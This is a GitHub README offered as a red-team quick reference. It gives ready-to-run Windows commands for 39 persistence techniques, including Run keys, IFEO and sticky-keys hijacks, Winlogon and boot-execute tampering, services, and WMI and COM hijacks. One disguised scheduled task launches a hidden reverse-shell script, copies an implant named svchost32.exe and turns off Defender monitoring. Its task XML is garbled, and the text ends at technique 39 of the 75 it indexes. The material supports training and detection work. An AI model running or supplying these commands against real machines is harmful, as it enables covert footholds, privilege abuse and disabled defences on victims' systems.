manikandantn68/window-persistence-Privilege-Escalation

GitHub: manikandantn68/window-persistence-Privilege-Escalation

A hands-on quick-reference of 67 Windows persistence and privilege-escalation techniques, with MITRE ATT&CK mappings, APT attribution, attack commands and cleanup steps.

Stars: 11 | Forks: 0

# Windows Persistence, Privilege Escalation and Post-Exploitation: Complete Reference

## Quick Index: Persistence Techniques

| # | Technique | Admin | MITRE TTP | ATT&CK ID |
|---|-----------|:-----:|-----------|-----------|
| 1 | Startup Folder - EXE Copy | ❌ | Boot or Logon Autostart Execution: Startup Folder | T1547.001 |
| 2 | Startup Folder - LNK Shortcut | ❌ | Boot or Logon Autostart Execution: Startup Folder | T1547.001 |
| 3 | All Users Startup | ✅ | Boot or Logon Autostart Execution: Startup Folder | T1547.001 |
| 4 | Scheduled Task (schtasks basics) | ❌ | Scheduled Task/Job: Scheduled Task | T1053.005 |
| 5 | Scheduled Task XML - Single Action | ❌ | Scheduled Task/Job: Scheduled Task | T1053.005 |
| 6 | Scheduled Task XML - Multiple Actions | ❌ | Scheduled Task/Job: Scheduled Task | T1053.005 |
| 7 | At.exe Legacy Scheduler | ❌ | Scheduled Task/Job: At | T1053.002 |
| 8 | Registry Run Key | ❌ | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| 9 | Explorer Policy Run Key | ❌ | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| 10 | Explorer Load Key | ❌ | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| 11 | CMD AutoRun | ❌ | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| 12 | Environment Variables | ❌ | Modify Registry | T1112 |
| 13 | Logon Script (UserInitMprLogonScript) | ❌ | Boot or Logon Initialization Scripts: Logon Script | T1037.001 |
| 14 | Logon BAT Script | ❌ | Boot or Logon Initialization Scripts: Logon Script | T1037.001 |
| 15 | StartupApproved Bypass | ❌ | Boot or Logon Autostart Execution: Startup Folder | T1547.001 |
| 16 | IFEO Debugger Hijack | ✅ | Event Triggered Execution: IFEO Injection | T1546.012 |
| 17 | SilentProcessExit | ✅ | Event Triggered Execution: IFEO Injection | T1546.012 |
| 18 | Userinit Hijack | ✅ | Boot or Logon Autostart Execution: Winlogon Helper DLL | T1547.004 |
| 19 | Shell Hijack | ✅ | Boot or Logon Autostart Execution: Winlogon Helper DLL | T1547.004 |
| 20 | Winlogon MPNotify | ✅ | Boot or Logon Autostart Execution: Winlogon Helper DLL | T1547.004 |
| 21 | Active Setup | ✅ | Boot or Logon Autostart Execution: Active Setup | T1547.014 |
| 22 | Boot Execute | ✅ | Pre-OS Boot: Bootkit (Session Manager) | T1542.003 |
| 23 | Terminal Server Initial Program (RDP) | ✅ | Remote Services: Remote Desktop Protocol | T1021.001 |
| 24 | Accessibility Features Hijack (sethc / utilman) | ✅ | Event Triggered Execution: Accessibility Features | T1546.008 |
| 25 | Screensaver (SCRNSAVE.EXE) | ❌ | Event Triggered Execution: Screensaver | T1546.002 |
| 26 | Screensaver Path Hijack | ❌ | Event Triggered Execution: Screensaver | T1546.002 |
| 27 | Shell Open Command Hijack | ❌ | Event Triggered Execution: Change Default File Association | T1546.001 |
| 28 | PATH Hijack | ❌ | Hijack Execution Flow: Path Interception | T1574.007 |
| 29 | Shortcut Hijack | ❌ | Boot or Logon Autostart Execution: Shortcut Modification | T1547.009 |
| 30 | Recycle Bin Persistence | ❌ | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| 31 | PowerShell Profile | ❌ | Event Triggered Execution: PowerShell Profile | T1546.013 |
| 32 | New Service | ✅ | Create or Modify System Process: Windows Service | T1543.003 |
| 33 | Modify Existing Service | ✅ | Create or Modify System Process: Windows Service | T1543.003 |
| 34 | Service Failure Recovery | ✅ | Create or Modify System Process: Windows Service | T1543.003 |
| 35 | BITS Job Persistence | ❌ | BITS Jobs | T1197 |
| 36 | Disk Cleanup COM Handler | ❌ | Event Triggered Execution: Component Object Model Hijacking | T1546.015 |
| 37 | Windows Error Reporting | ✅ | Event Triggered Execution: IFEO Injection | T1546.012 |
| 38 | Application Shim (AppCompat) | ✅ | Event Triggered Execution: Application Shimming | T1546.011 |
| 39 | WMI Event Subscription | ✅ | Event Triggered Execution: WMI Event Subscription | T1546.003 |
| 40 | Hidden User Account | ✅ | Create Account: Local Account | T1136.001 |
| 41 | fodhelper UAC Bypass | ❌ | Abuse Elevation Control Mechanism: Bypass UAC | T1548.002 |
| 42 | WSL Persistence | ❌ | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| 43 | DPAPI CurrentUser Registry | ❌ | Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 |
| 44 | DPAPI Machine Scope | ✅ | Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 |
| 45 | AES-Encrypted Registry Loader | ❌ | Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 |
| 46 | XOR Obfuscation + DPAPI + RunKey | ❌ | Obfuscated Files + Registry Run Keys | T1027 + T1547.001 |
| **DLL-based techniques** | | | | |
| 47 | AppInit_DLLs | ✅ | Event Triggered Execution: AppInit DLLs | T1546.010 |
| 48 | COM DLL Hijack (HKCU Override) | ❌ | Event Triggered Execution: COM Hijacking | T1546.015 |
| 49 | Service DLL - svchost.exe | ✅ | Create or Modify System Process: Windows Service | T1543.003 |
| 50 | Winlogon Notification Package DLL | ✅ | Boot or Logon Autostart Execution: Winlogon Helper DLL | T1547.004 |
| 51 | LSA Security Support Provider (SSP) DLL | ✅ | Boot or Logon Autostart Execution: Security Support Provider | T1547.005 |
| 52 | rundll32 + RunKey (Reflective DLL) | ❌ | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| 53 | Scheduled Task - rundll32 DLL | ❌ | Scheduled Task/Job: Scheduled Task | T1053.005 |
| 54 | Phantom DLL Hijack | ❌ | Hijack Execution Flow: DLL Search Order Hijacking | T1574.001 |
| 55 | .NET Profiler DLL (COR_PROFILER) | ❌ | Hijack Execution Flow: COR_PROFILER | T1574.012 |
| 56 | ETW Provider Hijack DLL | ✅ | Hijack Execution Flow | T1574 |
| 57 | AMSI Provider DLL | ✅ | Impair Defenses: Disable or Modify Tools | T1562.001 |
| 58 | Print Processor DLL | ✅ | Boot or Logon Autostart Execution: Print Processors | T1547.012 |
| 59 | Winsock LSP DLL | ❌ | Hijack Execution Flow | T1574 |
| 60 | netsh Helper DLL | ✅ | Hijack Execution Flow: DLL Search Order Hijacking | T1574.001 |
| 61 | WMI Provider DLL | ✅ | Event Triggered Execution: WMI Event Subscription | T1546.003 |
| 62 | Network Provider DLL | ✅ | Modify Authentication Process: Network Provider DLL | T1556.008 |
| 63 | Password Filter DLL (SAM) | ✅ | Modify Authentication Process: Password Filter DLL | T1556.002 |
| 64 | WinRT DLL Activation (HKCU) | ❌ | Hijack Execution Flow: DLL Side-Loading | T1574.002 |
| 65 | Credential Provider DLL | ✅ | Boot or Logon Autostart Execution: Winlogon Helper DLL | T1547.004 |
| 66 | Shell Extension DLL (Context Menu) | ❌ | Hijack Execution Flow: DLL Search Order Hijacking | T1574.001 |
| 67 | DiagTrack DLL Hijack | ❌ | Hijack Execution Flow: DLL Side-Loading | T1574.002 |

## Quick Index: Privilege Escalation Techniques

| # | Technique | Admin | MITRE TTP | ATT&CK ID |
|---|-----------|:-----:|-----------|-----------|
| 68 | Unquoted Service Path | ❌ | Hijack Execution Flow: Unquoted Path | T1574.009 |
| 69 | Weak Service Binary Permissions | ❌ | Hijack Execution Flow: Services File Permissions Weakness | T1574.010 |
| 70 | Weak Service Registry Permissions | ❌ | Hijack Execution Flow | T1574 |
| 71 | AlwaysInstallElevated (MSI) | ❌ | Abuse Elevation Control Mechanism | T1548 |
| 72 | Token Impersonation (PrintSpoofer / GodPotato) | ❌→✅ | Access Token Manipulation | T1134 |
| 73 | DLL Hijacking in SYSTEM Services | ❌ | DLL Search Order Hijacking | T1574.001 |
| 74 | SeImpersonatePrivilege Abuse | ❌→✅ | Access Token Manipulation: Token Impersonation | T1134.001 |
| 75 | Stored Credential Abuse | ❌ | Credentials from Password Stores | T1555 |

## Known APT Groups by Technique

| Technique / TTP | Known APT Groups |
|-----------------|-----------------|
| Startup Folder (T1547.001) | APT29 (Cozy Bear), APT32 (OceanLotus), Lazarus Group, FIN7 |
| Registry Run Keys (T1547.001) | APT28 (Fancy Bear), Turla, Kimsuky, Carbanak |
| Scheduled Task (T1053.005) | APT41, Lazarus Group, FIN6, Cobalt Group |
| Logon Script (T1037.001) | APT3, APT29 |
| IFEO Debugger Hijack (T1546.012) | Turla, APT3 |
| Winlogon Helper DLL (T1547.004) | APT28, Turla, PLATINUM |
| Active Setup (T1547.014) | APT29 |
| Accessibility Features Hijack (T1546.008) | APT3, APT28, CyberArk |
| Screensaver (T1546.002) | APT28, OilRig |
| Shell Open Command Hijack (T1546.001) | Patchwork, Turla |
| Path Interception (T1574.007) | APT41, PowerGhost |
| PowerShell Profile (T1546.013) | APT29, Turla |
| Windows Service (T1543.003) | APT28, Lazarus Group, FIN7, Carbanak |
| BITS Jobs (T1197) | APT41, APT28, FIN7, BRONZE BUTLER |
| COM Hijacking (T1546.015) | APT28, Turla, BRONZE BUTLER |
| Application Shimming (T1546.011) | CarbonSpider, FIN7 |
| WMI Event Subscription (T1546.003) | APT29, APT33, Lazarus Group, Turla |
| Create Account (T1136.001) | APT33, OilRig, Lazarus Group |
| UAC Bypass (T1548.002) | APT29, APT41, Turla |
| Obfuscation (T1027) | APT28, APT29, Lazarus Group, APT41 |
| AppInit DLLs (T1546.010) | Turla, APT29 |
| Security Support Provider (T1547.005) | Turla, APT28, PLATINUM |
| DLL Search Order Hijacking (T1574.001) | APT41, Lazarus Group, Turla |
| COR_PROFILER (T1574.012) | Lazarus Group, Turla |
| Print Processors (T1547.012) | Lazarus Group, APT28 |
| Network Provider DLL (T1556.008) | APT28, Lazarus Group |
| Password Filter DLL (T1556.002) | APT28, Lazarus Group |
| DLL Side-Loading (T1574.002) | APT41, Lazarus Group, APT29 |

## 1. Startup Folder - EXE Copy

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** APT29, APT32, Lazarus Group, FIN7

The Windows Startup folder is the autorun list that runs when the PC starts up: any program placed in it is launched automatically, with no manual start needed.

```
copy {path} "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
dir "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\"
Get-CimInstance Win32_StartupCommand | Select Name, Command, Location, User
wmic startup get caption,command
# Cleanup
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\(unknown)"
```

**Quick access:** `Win+R` → `shell:startup`

## 2. Startup Folder - LNK Shortcut

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** APT29, Lazarus Group

```
$WS = New-Object -ComObject WScript.Shell
$SC = $WS.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk")
$SC.TargetPath = "{path}"
$SC.Save()
# Cleanup
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"
```

## 3. All Users Startup

**TTP:** T1547.001 | **Admin:** ✅ | **APT:** APT29, FIN7

```
copy "{path}" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
```

**Quick access:** `Win+R` → `shell:common startup`

## 4. Scheduled Task (schtasks basics)

**TTP:** T1053.005 | **Admin:** ❌ | **APT:** APT41, Lazarus Group, FIN6

```
schtasks /create /tn "DemoTasks\OpenCalc" /sc daily /st 10:00 /tr "{path}"
schtasks /query /fo LIST /V
schtasks /query /tn "DemoTasks\OpenCalc" /fo LIST /v
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" } | Format-Table TaskName, TaskPath, State
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM"}
# Cleanup
schtasks /delete /tn "DemoTasks\OpenCalc" /f
```

## 5. Scheduled Task XML - Single Action

**TTP:** T1053.005 | **Admin:** ❌ | **APT:** APT41, Lazarus Group

```
# Task Scheduler XML body (only the element text survives in this copy; the element tags are missing)
@"
Microsoft Corporation Adobe Flash Sync Service \AdobeFlashSync true true $env:COMPUTERNAME\$env:USERNAME InteractiveToken HighestAvailable true PT0S 7 {path}
"@ | Out-File "task.xml" -Encoding Unicode
schtasks /create /tn "AdobeFlashSync" /xml "task.xml" /f
schtasks /query /tn "AdobeFlashSync" /fo LIST /v
schtasks /run /tn "AdobeFlashSync"
# Cleanup
schtasks /delete /tn "AdobeFlashSync" /f
```

**XML task file location:** `C:\Windows\System32\Tasks\`

## 6. Scheduled Task XML - Multiple Actions

**TTP:** T1053.005 | **Admin:** ❌ | **APT:** APT41, Cobalt Group

Multi-action task: runs the implant, starts a PowerShell reverse shell, copies the implant to the Startup folder, adds a Run key and disables Defender.

```
# Task Scheduler XML body (only the element text survives in this copy; the element tags are missing)
@"
Microsoft Corporation Windows Defender Sync Service true true PT5Mfalse 2026-01-01T00:00:00 true 1 truePT0S {path} powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\path\to\shell.ps1 cmd.exe /c copy {path} "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\svchost32.exe" reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinDefSync" /t REG_SZ /d "{path}" /f powershell.exe -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
"@ | Out-File "multitask.xml" -Encoding Unicode
schtasks /create /tn "WindowsDefenderSync" /xml "multitask.xml" /f
schtasks /run /tn "WindowsDefenderSync"
# Cleanup
schtasks /delete /tn "WindowsDefenderSync" /f
```

## 7. At.exe Legacy Scheduler

**TTP:** T1053.002 | **Admin:** ❌ | **APT:** APT28, older threat actors

```
at 10:00 /every:M,T,W,Th,F "{path}"
at
at /delete /yes
```

## 8. Registry Run Key

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** APT28, Turla, Kimsuky, Carbanak

```
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "MSUpdate" /t REG_SZ /d "{path}" /f
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate
# Machine-wide (admin)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MSUpdate" /t REG_SZ /d "{path}" /f
# Cleanup
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /f
```

## 9. Explorer Policy Run Key

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** APT28, Turla

```
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "MSUpdate" /t REG_SZ /d "{path}" /f
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
# Cleanup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v MSUpdate /f
```

## 10. Explorer Load Key

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** Turla, BRONZE BUTLER

```
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "{path}" /f
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load
# Cleanup
reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /f
```

## 11. CMD AutoRun

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** Turla, FIN7

```
reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "{path}" /f
reg query "HKCU\Software\Microsoft\Command Processor" /v AutoRun
# Cleanup
reg delete "HKCU\Software\Microsoft\Command Processor" /v AutoRun /f
```

## 12. Environment Variables

**TTP:** T1112 | **Admin:** ❌ | **APT:** OilRig, APT28

```
reg add "HKEY_CURRENT_USER\Environment" /v DemoApp /t REG_SZ /d "{path}" /f
# Cleanup
REG DELETE "HKEY_CURRENT_USER\Environment" /v DemoApp /f
```

## 13. Logon Script

**TTP:** T1037.001 | **Admin:** ❌ | **APT:** APT3, APT29, Lazarus Group

```
reg add "HKCU\Environment" /v "UserInitMprLogonScript" /t REG_SZ /d "{path}" /f
reg query "HKCU\Environment" /v UserInitMprLogonScript
# Cleanup
reg delete "HKCU\Environment" /v UserInitMprLogonScript /f
```

## 14. Logon BAT Script

**TTP:** T1037.001 | **Admin:** ❌ | **APT:** APT3, Kimsuky

```
echo {path} > C:\ProgramData\logon.bat
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\ProgramData\logon.bat" /f
# Cleanup
reg delete "HKCU\Environment" /v UserInitMprLogonScript /f
del C:\ProgramData\logon.bat
```

## 15. StartupApproved Bypass

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** FIN7

```
copy "{path}" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
$val = [byte[]](0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder" `
    -Name "update.exe" -Value $val -Type Binary
# Cleanup
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder" -Name "update.exe"
```

## 16. IFEO Debugger Hijack

**TTP:** T1546.012 | **Admin:** ✅ | **APT:** Turla, APT3, PLATINUM

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "{path}" /f
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /f
```

## 17. SilentProcessExit

**TTP:** T1546.012 | **Admin:** ✅ | **APT:** Turla, APT3

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "{path}" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /f
```

## 18. Userinit Hijack

**TTP:** T1547.004 | **Admin:** ✅ | **APT:** APT28, Turla, PLATINUM

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,{path}" /f
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
# Restore
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f
```

## 19. Shell Hijack

**TTP:** T1547.004 | **Admin:** ✅ | **APT:** APT28, Turla

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,{path}" /f
# Restore
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f
```

## 20. Winlogon MPNotify

**TTP:** T1547.004 | **Admin:** ✅ | **APT:** APT28, PLATINUM

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v mpnotify /t REG_SZ /d "{path}" /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v mpnotify /f
```

## 21. Active Setup

**TTP:** T1547.014 | **Admin:** ✅ | **APT:** APT29

```
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{EVIL001}" /v StubPath /t REG_SZ /d "{path}" /f
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{EVIL001}" /v Version /t REG_SZ /d "1,0,0,0" /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{EVIL001}" /f
```

## 22. Boot Execute

**TTP:** T1542.003 | **Admin:** ✅ | **APT:** Advanced nation-state actors

```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *\0{path}" /f
# Restore
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
```

## 23. Terminal Server Initial Program (RDP)

**TTP:** T1021.001 | **Admin:** ✅ | **APT:** APT33, OilRig, Lazarus Group

```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "{path}" /f
# Cleanup
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /f
```

## 24. Accessibility Features Hijack (sethc / utilman)

**TTP:** T1546.008 | **Admin:** ✅ | **APT:** APT3, APT28, CyberArk

```
# sethc.exe = press Shift 5 times on the lock screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "{path}" /f
# utilman.exe = press Win+U on the lock screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "{path}" /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
```

## 25. Screensaver (SCRNSAVE.EXE)

**TTP:** T1546.002 | **Admin:** ❌ | **APT:** APT28, OilRig

```
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "{path}" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f
# Restore
reg add "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "" /f
reg add "HKCU\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "900" /f
reg add "HKCU\Control Panel\Desktop" /v "ScreenSaveActive" /t REG_SZ /d "0" /f
```

## 26. Screensaver Path Hijack

**TTP:** T1546.002 | **Admin:** ❌ | **APT:** APT28, OilRig

```
copy "{path}" "%APPDATA%\scrnsave.scr"
reg add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%APPDATA%\scrnsave.scr" /f
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "10" /f
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
# Cleanup
reg delete "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /f
del "%APPDATA%\scrnsave.scr"
```

## 27. Shell Open Command Hijack

**TTP:** T1546.001 | **Admin:** ❌ | **APT:** Patchwork, Turla

```
reg add "HKCU\Software\Classes\txtfile\shell\open\command" /ve /t REG_SZ /d "{path} %1" /f
# Cleanup
reg delete "HKCU\Software\Classes\txtfile" /f
```

## 28. PATH Hijack

**TTP:** T1574.007 | **Admin:** ❌ | **APT:** APT41, PowerGhost

```
$env:PATH -split ";"
copy "{path}" "$env:LOCALAPPDATA\Microsoft\WindowsApps\python.exe"
copy "{path}" "$env:LOCALAPPDATA\Microsoft\WindowsApps\git.exe"
copy "{path}" "$env:LOCALAPPDATA\Microsoft\WindowsApps\node.exe"
where.exe python
# Cleanup
del "$env:LOCALAPPDATA\Microsoft\WindowsApps\python.exe"
```

## 29. Shortcut Hijack

**TTP:** T1547.009 | **Admin:** ❌ | **APT:** Turla, APT32

```
$path = "$env:USERPROFILE\Desktop\Google Chrome.lnk"
$WS = New-Object -ComObject WScript.Shell
$SC = $WS.CreateShortcut($path)
$SC.TargetPath = "{path}"
$SC.IconLocation = "C:\Program Files\Google\Chrome\Application\chrome.exe"
$SC.Save()
# Restore
$SC.TargetPath = "C:\Program Files\Google\Chrome\Application\chrome.exe"
$SC.Save()
```

## 30. Recycle Bin Persistence

**TTP:** T1547.001 | **Admin:** ❌ | **APT:** Custom / red team

```
$sid = (whoami /user | Select-String "S-1-").ToString().Trim().Split()[-1]
$recyclePath = "C:\`$Recycle.Bin\$sid"
copy "{path}" "$recyclePath\winlogon.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Recycle" /t REG_SZ /d "$recyclePath\winlogon.exe" /f
# Cleanup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Recycle" /f
del "$recyclePath\winlogon.exe"
```

## 31. PowerShell Profile

**TTP:** T1546.013 | **Admin:** ❌ | **APT:** APT29, Turla

```
New-Item -ItemType Directory -Path "$HOME\Documents\WindowsPowerShell" -Force
echo "{path}" > "$HOME\Documents\WindowsPowerShell\profile.ps1"
# Cleanup
del $HOME\Documents\WindowsPowerShell\profile.ps1
```

## 32. New Service

**TTP:** T1543.003 | **Admin:** ✅ | **APT:** APT28, Lazarus Group, FIN7, Carbanak

```
sc.exe create UpdateService binPath= "{path}" start= auto
sc.exe query UpdateService
sc.exe start UpdateService
# Cleanup
sc.exe delete UpdateService
```

## 33. Modify Existing Service

**TTP:** T1543.003 | **Admin:** ✅ | **APT:** APT28, Carbanak

```
sc config UpdateService binpath= "{path}"
sc stop UpdateService
sc start UpdateService
sc qc UpdateService
```

## 34. Service Failure Recovery

**TTP:** T1543.003 | **Admin:** ✅ | **APT:** Custom / red team

```
sc create FakeSvc binPath= "C:\Windows\System32\svchost.exe" start= auto
sc failure FakeSvc reset= 0 actions= run/0
sc failureflag FakeSvc 1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc\Parameters" /v FailureCommand /t REG_SZ /d "{path}" /f
sc stop FakeSvc
# Cleanup
sc delete FakeSvc
```

## 35. BITS Job Persistence

**TTP:** T1197 | **Admin:** ❌ | **APT:** APT41, APT28, FIN7, BRONZE BUTLER

```
bitsadmin /create /download PersistJob
bitsadmin /addnotifycmdline PersistJob "{path}" ""
bitsadmin /SetNotifyFlags PersistJob 1
bitsadmin /resume PersistJob
bitsadmin /list /allusers /verbose
# Cleanup
bitsadmin /cancel PersistJob
```

## 36. Disk Cleanup COM Handler

**TTP:** T1546.015 | **Admin:** ❌ | **APT:** APT28, Turla, BRONZE BUTLER

```
reg add "HKCU\Software\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}\InprocServer32" /ve /t REG_SZ /d "{path}" /f
reg add "HKCU\Software\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f
cleanmgr.exe
# Cleanup
reg delete "HKCU\Software\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}" /f
```

## 37. Windows Error Reporting

**TTP:** T1546.012 | **Admin:** ✅ | **APT:** Nation-state actors

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /t REG_SZ /d "{path} %ld %ld" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1" /f
# Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v Debugger /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v Auto /f
```

## 38. Application Shim (AppCompat)

**TTP:** T1546.011 | **Admin:** ✅ | **APT:** CarbonSpider, FIN7

```
sdbinst.exe evil.sdb
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB"
:: Cleanup
sdbinst.exe -u evil.sdb
```

## 39. WMI Event Subscription

**TTP:** T1546.003 | **Admin:** ✅ | **APT:** APT29, APT33, Lazarus Group, Turla

```
$filterArgs = @{
    Name = "INFilter"; EventNameSpace = "root\cimv2"; QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name='wordpad.exe'"
}
$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments $filterArgs
$consumerArgs = @{ Name = "INConsumer"; CommandLineTemplate = "{path}" }
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments $consumerArgs
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{ Filter = $filter; Consumer = $consumer }
# Verify
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer
# Cleanup
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter -Filter "Name='INFilter'" | Remove-WmiObject
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer -Filter "Name='INConsumer'" | Remove-WmiObject
Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding | Remove-WmiObject
```

